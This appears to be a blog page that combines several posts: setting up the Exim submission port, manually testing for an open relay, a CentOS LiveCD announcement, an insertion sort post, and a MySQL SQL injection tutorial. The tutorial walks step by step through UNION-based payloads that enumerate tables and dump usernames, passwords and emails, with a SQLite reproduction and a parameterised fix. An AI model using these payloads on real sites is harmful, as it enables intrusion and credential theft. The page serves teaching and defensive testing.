Exim alternate port 587

Nowadays most ISPs block outbound connections to port 25, which is easy to test by opening a telnet connection to a mail server on port 25:

$ telnet dragos.fedorovici.com 25
Trying 67.210.111.70...
telnet: Unable to connect to remote host: Connection timed out

If you see the error above, your ISP is very likely blocking the ability to send mail through servers other than their own. Over the last few years more and more ISPs have started to require their subscribers to use the ISP's SMTP server for outgoing mail. This lets them monitor spammers and reduce the overwhelming amount of spam and abuse that goes through e-mail every day. You may want to contact your ISP to see whether they are willing to work with you on this, or try port 587 (the standard mail submission port) or 26, which may be open.

On the server side, if you are running Exim as the default MTA, you can work around this block by having Exim listen on an alternate port and letting your clients use it for outgoing SMTP. Port 587 is the port reserved for mail submission, so it is the natural choice; the important caveat is that it must still require SMTP AUTH (and ideally STARTTLS) before relaying, otherwise you have just opened a second port 25. To add the port, edit the Exim configuration file (usually /etc/exim.conf) and add a line similar to the following:

daemon_smtp_ports = 25 : 587

Restart the mail server and you should be able to bypass the restriction added by your ISP:

$ telnet dragos.fedorovici.com 587
Trying 67.210.111.70...
Connected to dragos.fedorovici.com.
Escape character is '^]'.
220-torch.lunarmania.com ESMTP Exim 4.69 #1 Wed, 07 Dec 2011 13:32:08 -0800
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
^]

telnet>

Open Relay test

An open relay is an SMTP server that allows third-party relaying of e-mail messages. By accepting mail that is neither for nor from a local user, an open relay makes it possible for an unscrupulous sender to route large volumes of unsolicited e-mail through it. While there are a large number of online tools that will verify whether your mail server is an open relay, those who prefer testing manually can do it by opening a telnet connection on port 25 and trying to send a message from an outside address to an outside address, without authenticating:

# telnet 85.204.103.34 25
Trying 85.204.103.34...
Connected to 85.204.103.34.
Escape character is '^]'.
220 server.auxell.ro
helo client.auxell.ro
250 server.auxell.ro
mail from: dragos.fedorovici@google.com
250 2.1.0 Ok
rcpt to: dragos.fedorovici@gmail.com
554 5.7.1: Relay access denied

If you receive a similar message, then your mail server is secured (at least from this point of view): the relay decision is taken at RCPT TO, before any message content is sent, which is why the test can stop here. Note that this covers only the outside-to-outside case; it is worth repeating the test with a sender in your own domain, since some servers wrongly relay anything that merely claims to come from a local user. The commands used in the above example are detailed below:

helo – the client sends this command to the SMTP server to identify itself and initiate the SMTP conversation. The domain name or IP address of the SMTP client is usually sent as an argument together with the command (e.g. “HELO client.example.com”). If a domain name is used as an argument with the HELO command, it must be a fully qualified domain name.

mail from – specifies the e-mail address of the sender and tells the SMTP server that a new mail transaction is starting. If the sender's address is accepted the server replies with a 250 OK code. Nothing about this address is verified, so it is trivially forged; a relay decision must never be based on it alone.

rcpt to – specifies the e-mail address of the recipient. This command can be repeated multiple times for a given e-mail message in order to deliver a single e-mail message to multiple recipients.
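To make both checks repeatable (whether the submission port advertises AUTH and STARTTLS, and whether the server refuses to relay for an outside sender and recipient), here is an added example in Python that scripts the exchange above; it is not code from this post. It drives the same commands over any transport, so it runs offline against a scripted stand-in whose replies are modelled on the exchange shown (the locked-down server) and on a hypothetical server that does relay, and probe_host() runs the same check against a real server on port 25 or 587. The host names and addresses in the scripted replies are constructed.

```python
"""Manual open-relay / submission-port probe driven over raw SMTP.
Added example, not code from the post; scripted replies below are constructed."""
import socket
from typing import Callable, Dict, List, Tuple


def read_reply(recv_line: Callable[[], str]) -> Tuple[int, List[str]]:
    """Read one SMTP reply. A '-' after the code continues the reply; a space ends it."""
    lines: List[str] = []
    while True:
        line = recv_line()
        if len(line) < 3 or not line[:3].isdigit():
            raise ValueError("malformed SMTP reply line: %r" % line)
        lines.append(line)
        if len(line) == 3 or line[3] != "-":
            return int(line[:3]), lines


def relay_check(send: Callable[[str], None], recv_line: Callable[[], str],
                helo_name: str, sender: str, recipient: str) -> Dict[str, object]:
    """Repeat the post's unauthenticated EHLO (or HELO) / MAIL FROM / RCPT TO exchange.

    Sender and recipient are both foreign to the server. A 250 to RCPT TO means it
    will carry mail for anyone (open relay); a 5xx such as '554 5.7.1 Relay access
    denied' means relaying is refused. No DATA is sent, so nothing is delivered.
    """
    code, banner = read_reply(recv_line)
    if code != 220:
        raise RuntimeError("expected 220 greeting, got %s" % banner)
    send("EHLO %s\r\n" % helo_name)
    code, ehlo = read_reply(recv_line)
    if code != 250:                      # pre-ESMTP server: fall back to plain HELO
        send("HELO %s\r\n" % helo_name)
        code, ehlo = read_reply(recv_line)
        if code != 250:
            raise RuntimeError("HELO rejected: %s" % ehlo)
    # EHLO keywords tell you whether this port offers STARTTLS and SMTP AUTH
    extensions = {l[4:].split()[0].upper() for l in ehlo[1:] if len(l) > 4}
    send("MAIL FROM:<%s>\r\n" % sender)
    mail_code, _ = read_reply(recv_line)
    rcpt_code = None
    if mail_code == 250:
        send("RCPT TO:<%s>\r\n" % recipient)
        rcpt_code, _ = read_reply(recv_line)
    send("QUIT\r\n")
    return {"banner": banner[0], "starttls": "STARTTLS" in extensions,
            "auth": "AUTH" in extensions, "mail_code": mail_code,
            "rcpt_code": rcpt_code, "open_relay": rcpt_code == 250}


def probe_host(host: str, port: int = 25, helo_name: str = "probe.example.test",
               sender: str = "probe@example.org", recipient: str = "probe@example.net",
               timeout: float = 10.0) -> Dict[str, object]:
    """Run relay_check against a live server; use port=587 to inspect the submission port."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("r", encoding="ascii", errors="replace", newline="\r\n")

        def recv_line() -> str:
            line = rfile.readline()
            if not line:
                raise EOFError("server closed the connection")
            return line.rstrip("\r\n")

        return relay_check(lambda s: sock.sendall(s.encode("ascii")), recv_line,
                           helo_name, sender, recipient)


class ScriptedServer:
    """Constructed stand-in for a real MTA: replays canned replies so the check runs offline."""

    def __init__(self, greeting: str, ehlo: List[str], mail: str, rcpt: str) -> None:
        self.replies = {"EHLO": ehlo, "MAIL": [mail], "RCPT": [rcpt], "QUIT": ["221 2.0.0 Bye"]}
        self.pending = [greeting]          # the greeting arrives before any command
        self.transcript: List[str] = []

    def send(self, data: str) -> None:
        cmd = data.rstrip("\r\n")
        self.transcript.append("C: " + cmd)
        self.pending.extend(self.replies.get(cmd.split()[0].upper(), ["500 5.5.1 Unrecognized"]))

    def recv_line(self) -> str:
        line = self.pending.pop(0)
        self.transcript.append("S: " + line)
        return line


# Replies modelled on the refusal shown in the post, and on a hypothetical server that relays.
LOCKED_DOWN = dict(greeting="220 server.auxell.ro ESMTP",
                   ehlo=["250-server.auxell.ro", "250-STARTTLS", "250-AUTH PLAIN LOGIN", "250 8BITMIME"],
                   mail="250 2.1.0 Ok", rcpt="554 5.7.1: Relay access denied")
OPEN_RELAY = dict(greeting="220 mail.example.test ESMTP",
                  ehlo=["250-mail.example.test", "250 8BITMIME"],
                  mail="250 2.1.0 Ok", rcpt="250 2.1.5 Ok")


def probe_scripted(script: dict) -> Dict[str, object]:
    """Run the same check against one of the scripted servers above."""
    srv = ScriptedServer(**script)
    return relay_check(srv.send, srv.recv_line, "client.auxell.ro",
                       "dragos.fedorovici@google.com", "dragos.fedorovici@gmail.com")


if __name__ == "__main__":
    for label, script in (("locked down", LOCKED_DOWN), ("open relay", OPEN_RELAY)):
        print(label, probe_scripted(script))
```

Against a real host, probe_host("mail.example.test", 587) should report auth True and open_relay False; auth False on 587 means the submission port is just another unauthenticated listener.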

CentOS-6.0 is here

The CentOS development team is pleased to announce the availability of the CentOS LiveCD 6.0 for both the i386 and x86_64 architectures. These LiveCDs are based on the CentOS-6.0 i386 and x86_64 distributions.

The CentOS-6.0 LiveCD is meant to be a Linux environment suited to be run directly from either CD media or USB storage devices. It does not need any persistent storage on a machine, which also makes it a suitable recovery environment.

Due to space constraints it was not possible to include all the traditional desktop applications on the LiveCD. You can, however, enjoy a basic GNOME desktop, view and modify pictures with gThumb and the GIMP, browse the web with Firefox, send e-mail with Thunderbird and connect to your favourite instant messaging network with Pidgin.

The CentOS-6.0 LiveCD has been released to all external mirrors and is available for download now. The list of mirrors is available at these URLs:

http://isoredirect.centos.org/centos/6/isos/i386/
http://isoredirect.centos.org/centos/6/isos/x86_64/

SQL Injection

NOTE: INTENDED FOR EDUCATIONAL PURPOSE ONLY. 

How to exploit a MySQL injection vulnerability (error-based SQL injection):

1st step: CHECKING FOR A VULNERABILITY

Suppose we have website like this:

http://www.site.com/script.php?id=21

To test this URL, we add a quote to it ‘

http://www.site.com/script.php?id=21'

On executing it, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1", that means the script passes our input straight into the query and the target is vulnerable to SQL injection.

If instead the response is a PHP warning such as: Warning: mysql_real_escape_string(): supplied argument is not a valid MySQL result resource in [file] at [line], then the script is escaping its input before using it, and you will need to look for another target.

mysql_real_escape_string() takes a string that is going to be used in a MySQL query and returns the same string with the characters that matter to SQL escaped; in particular it replaces the troublesome quote (') a user might enter with the MySQL-safe \'. Keep in mind that this only protects values that are enclosed in quotes in the query. The id parameter in this example is numeric and is pasted into the query unquoted, and none of the payloads used below contains a quote at all, so escaping alone does not stop them; only validating the type (or using prepared statements with bound parameters) does.

2nd step: FINDING THE COLUMNS

To find the number of columns we use ORDER BY (which tells the database how to order the result). We increment the column number until we get an error:

http://www.site.com/script.php?id=21 order by 1 <– no error

http://www.site.com/script.php?id=21 order by 2 <– no error

http://www.site.com/script.php?id=21 order by 3 <– no error

http://www.site.com/script.php?id=21 order by 4 <– no error

http://www.site.com/script.php?id=21 order by 5 <– error

// you get a message like this: Unknown column '5' in 'order clause'

This means that the query has 4 columns, because we got an error at column 5.

3rd step: CHECKING THE FUNCTIONALITY OF THE UNION FUNCTION

The next step is to check whether UNION works. UNION lets us append the rows of a second SELECT of our own to the result of the original query, as long as it returns the same number of columns. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,4
//we already know the number of columns from step 2

If we see some of the numbers on the screen, i.e. 1, 2, 3 or 4, that means the UNION works, and the numbers we see tell us which columns the page actually displays.

4th step: CHECKING THE MySQL VERSION

The first piece of information we will retrieve is the MySQL version. Let us assume that while checking the UNION we got the number 4 on the screen. To detect the version, we replace the number 4 in our query with @@version or version(). Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,@@version

If you get an error like Illegal mix of collations (IMPLICIT + COERCIBLE), the string needs converting before it can be UNIONed with the original column; the usual trick is hex() and unhex():

http://www.site.com/script.php?id=21 union all select 1,2,3,unhex(hex(@@version))

LAST STEP: TABLE(S) AND COLUMN(S) NAME(S)

If the server runs MySQL 5.0 or later, we use the information_schema database (it holds the names of all tables and columns). To get table names we select table_name from information_schema.tables. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,table_name from information_schema.tables

Here we replace our number 4 with table_name; without a LIMIT the query returns every table name, but the page typically shows only one row, so we add LIMIT to the end of the query to list the tables one at a time. Note that a trailing LIMIT applies to the whole UNION, not just to our SELECT: if id=21 still matches a real row, that row is the one shown for limit 0,1, so either start from limit 1,1 or use an id that matches nothing (for example id=-21). Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,table_name from information_schema.tables limit 0,1

Now to view the second table, we change limit 0,1 to limit 1,1 (the second table is displayed):

http://www.site.com/script.php?id=21 union all select 1,2,3,table_name from information_schema.tables limit 1,1

For the third table we use limit 2,1:

http://www.site.com/script.php?id=21 union all select 1,2,3,table_name from information_schema.tables limit 2,1

Keep incrementing until you get something useful like db_admin, auth, auth_user, login_username, login_password etc.

To get the column names the method is the same. Here we use column_name and information_schema.columns. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,column_name from information_schema.columns limit 0,1

The first column name is displayed. For the second column we change limit 0,1 to limit 1,1 and so on. If you want to display the column names of a specific table, use a WHERE clause. Let us assume that we have found a table 'users'. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,column_name from information_schema.columns where table_name='users'

Note that this will not work if magic_quotes_gpc is on, because the quotes around users get escaped. The string can be supplied without quotes as a hex literal instead, in the same way 0x3a stands for a colon further down: table_name=0x7573657273 ('users' in hex).

Now the column names of the table users are displayed; using LIMIT we can list all of them.

Let us say that we found the columns user, pass and email. To complete the attack we put them together in a single string using concat():

http://www.site.com/script.php?id=21 union all select 1,2,3,concat(user,0x3a,pass,0x3a,email) from users

Note: 0x3a is hex value for colon.

The result is user:pass:email from table users!
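The whole procedure, steps 1 to 5 plus the fix the tutorial never shows, as an added example run against an in-memory SQLite database; it is not the post's code, and the articles and users tables with their rows are constructed for the demonstration. SQLite has no information_schema, so its sqlite_master catalogue and pragma_table_info() stand in for information_schema.tables and .columns, || with char(58) replaces concat() with 0x3a, and id=-1 is used for the UNION payloads so that the trailing LIMIT counts only the injected rows. vulnerable_lookup() is the unquoted string concatenation the tutorial exploits; safe_lookup() is the same query with the parameter validated and bound.

```python
"""The post's UNION-based walk-through reproduced against SQLite, beside the fixed query.
Added example, not the post's code; schema and rows are constructed."""
import sqlite3
from typing import List, Optional, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed sample data: the 4-column table behind script.php and a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO articles VALUES (21, 'Welcome', 'first post', 'dragos');
        CREATE TABLE users (user TEXT, pass TEXT, email TEXT);
        INSERT INTO users VALUES ('admin', 'Pa55w0rd', 'admin@site.com');
    """)
    return db


def vulnerable_lookup(db: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """Mirrors script.php?id=...: the parameter is glued into the SQL text unquoted.
    Escaping quotes would not help here; none of the payloads below contains one."""
    return db.execute("SELECT id, title, body, author FROM articles WHERE id=" + id_param).fetchall()


def render(rows: List[Tuple]) -> List[Tuple[str, str]]:
    """What the page shows of each row: only the title (column 2) and author (column 4)."""
    return [(str(r[1]), str(r[3])) for r in rows]


def count_columns(db: sqlite3.Connection, max_cols: int = 20) -> Optional[int]:
    """Step 2: ORDER BY n succeeds up to the column count and errors one past it."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(db, "21 order by %d" % n)
        except sqlite3.OperationalError:   # MySQL: Unknown column 'n' in 'order clause'
            return n - 1
    return None


def visible_markers(db: sqlite3.Connection, ncols: int) -> List[int]:
    """Step 3: UNION ALL SELECT 1,2,..,n and report which markers reach the page."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    shown = render(vulnerable_lookup(db, "-1 union all select " + markers))
    return sorted({int(v) for row in shown for v in row if v.isdigit()})


def injected(db: sqlite3.Connection, select_tail: str) -> List[str]:
    """Steps 4-5: id=-1 matches no real row, so only the UNIONed rows are rendered and a
    trailing LIMIT (which applies to the whole UNION) counts just those. Marker 2 fills
    the title slot; whatever we want to read goes into the displayed author slot."""
    rows = vulnerable_lookup(db, "-1 union all select 1,2,3," + select_tail)
    return [author for _, author in render(rows)]


def walk(db: sqlite3.Connection, source: str) -> List[str]:
    """Fetch one catalogue row per request with LIMIT offset,1 until none is left."""
    names, offset = [], 0
    while True:
        got = injected(db, "%s limit %d,1" % (source, offset))
        if not got:
            return names
        names.append(got[0])
        offset += 1


def list_tables(db: sqlite3.Connection) -> List[str]:
    """sqlite_master stands in for information_schema.tables."""
    return walk(db, "name from sqlite_master where type='table'")


def list_columns(db: sqlite3.Connection, table: str) -> List[str]:
    """pragma_table_info() stands in for information_schema.columns ... where table_name=..."""
    return walk(db, "name from pragma_table_info('%s')" % table)


def dump_users(db: sqlite3.Connection) -> List[str]:
    """Last step: concat(user,0x3a,pass,0x3a,email) in SQLite spelling (char(58) is ':')."""
    return injected(db, "user||char(58)||pass||char(58)||email from users")


def safe_lookup(db: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """Hardened form: validate the type, then bind the value; the SQL text never changes."""
    if not id_param.lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    return db.execute("SELECT id, title, body, author FROM articles WHERE id=?",
                      (int(id_param),)).fetchall()


def is_rejected(db: sqlite3.Connection, id_param: str) -> bool:
    """True when the hardened lookup refuses the parameter."""
    try:
        safe_lookup(db, id_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    n = count_columns(db)
    print("columns:", n, "markers shown:", visible_markers(db, n))
    print("tables:", list_tables(db), "users columns:", list_columns(db, "users"))
    print("dump:", dump_users(db))
    print("hardened rejects payload:", is_rejected(db, "21 union all select 1,2,3,4"))
```

The same payload that dumps admin:Pa55w0rd:admin@site.com through vulnerable_lookup() is rejected outright by safe_lookup(), and even if the type check were dropped the bound parameter would be compared as a value rather than parsed as SQL.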

Insertion sort algorithm

Insertion sort is a simple sorting algorithm: a comparison sort in which the sorted array/list is built one entry at a time, each new entry being inserted at its place among those already sorted. It is much less efficient on large lists than more advanced algorithms such as quicksort, heapsort or merge sort. This post was created for educational purposes; please check this video, which explains the entire algorithm:
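As an added example (not code from the post), the algorithm in Python with a comparison counter, which makes the efficiency remark above concrete: already-sorted input costs n-1 comparisons, reversed input n(n-1)/2.

```python
"""Insertion sort with a comparison counter (added example, not from the post)."""
from typing import Callable, List, Optional, Tuple, TypeVar

T = TypeVar("T")


def _sort(items: List[T], key: Optional[Callable[[T], object]]) -> Tuple[List[T], int]:
    """Sort a copy of items, returning (sorted list, number of comparisons made).

    Invariant: a[:i] is sorted before step i. Each step pulls a[i] out, shifts every
    larger element one slot to the right, and drops a[i] into the gap. Shifting stops
    at the first element that is not larger, so equal keys keep their order (stable).
    """
    a = list(items)
    k = key or (lambda x: x)          # identity key when none is given
    comparisons = 0
    for i in range(1, len(a)):
        current, j = a[i], i - 1
        while j >= 0:
            comparisons += 1
            if not k(a[j]) > k(current):
                break
            a[j + 1] = a[j]             # shift the larger element right
            j -= 1
        a[j + 1] = current
    return a, comparisons


def insertion_sort(items: List[T], key: Optional[Callable[[T], object]] = None) -> List[T]:
    """Return a new list with the items in ascending order of key."""
    return _sort(items, key)[0]


def comparison_count(items: List[T], key: Optional[Callable[[T], object]] = None) -> int:
    """Sorted input costs n-1 comparisons, reversed input n(n-1)/2: the quadratic
    worst case is why the algorithm falls behind merge sort or heapsort on large lists."""
    return _sort(items, key)[1]


if __name__ == "__main__":
    print(insertion_sort([5, 2, 4, 6, 1, 3]))
    print(comparison_count(list(range(10))), comparison_count(list(range(10, 0, -1))))
```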

Enjoy!